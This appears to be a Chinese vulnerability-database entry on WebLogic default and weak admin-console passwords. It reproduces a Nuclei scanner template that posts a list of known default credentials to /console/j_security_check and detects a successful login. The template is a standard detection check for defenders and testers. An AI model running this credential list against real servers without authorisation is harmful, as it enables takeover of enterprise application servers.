漏洞信息
漏洞名称: WebLogic 弱口令漏洞
漏洞类型: 弱口令
漏洞等级: 高危
漏洞描述: WebLogic是由Oracle公司开发的一款企业级Java应用服务器,广泛用于构建和部署分布式企业级应用。它支持多种Java EE标准,是企业中常见的关键中间件之一。由于其广泛的应用,WebLogic的安全性尤为重要。
该漏洞属于弱口令漏洞,具体表现为WebLogic管理控制台存在默认或弱密码。攻击者可以利用这些默认或弱密码轻易登录到WebLogic管理控制台,从而获取对服务器的控制权限。这种漏洞的存在通常是由于管理员未更改默认密码或设置了过于简单的密码。
此漏洞的危害性较高,因为攻击者一旦获取了管理控制台的访问权限,就可以执行任意代码、部署恶意应用、访问敏感数据等,严重威胁到企业信息系统的安全。由于不需要任何前置条件,攻击者可以自动化地进行批量尝试,增加了被利用的风险。因此,管理员应立即更改默认密码,并确保使用强密码策略以防止此类攻击。
产品厂商: Oracle
产品名称: WebLogic
来源: https://github.com/projectdiscovery/nuclei-templates/blob/d694ffeb6baa526904249ded765790e5726c0b03/http%2Fdefault-logins%2Fweblogic%2Fweblogic-weak-login.yaml
类型: projectdiscovery/nuclei-templates:github issues
POC详情
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84
| id: weblogic-weak-login
info: name: WebLogic Default Login author: pdteam severity: high description: WebLogic default login credentials were discovered. reference: - https://github.com/vulhub/vulhub/tree/master/weblogic/weak_password - https://www.s-squaresystems.com/weblogic-default-admin-users-password-change/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L cvss-score: 8.3 cwe-id: CWE-522 metadata: max-request: 17 tags: default-login,weblogic,vulhub
flow: http(1) && http(2)
http: - raw: - | GET / HTTP/1.1 Host: {{Hostname}}
matchers: - type: word words: - "WebLogic" - "Oracle" - "console" condition: or internal: true
- raw: - raw: - | GET /console/ HTTP/1.1 Host: {{Hostname}} - | POST /console/j_security_check HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded
j_username={{ username }}&j_password={{ password }}&j_character_encoding=UTF-8
attack: pitchfork payloads: username: - weblogic - weblogic - weblogic - weblogic - weblogic - admin - admin - system password: - weblogic - weblogic1 - welcome1 - Oracle@123 - weblogic123 - 12345678 - security - password stop-at-first-match: true
matchers-condition: and matchers: - type: word part: header words: - "/console/index.jsp" - "ADMINCONSOLESESSION" condition: and
- type: status status: - 302
|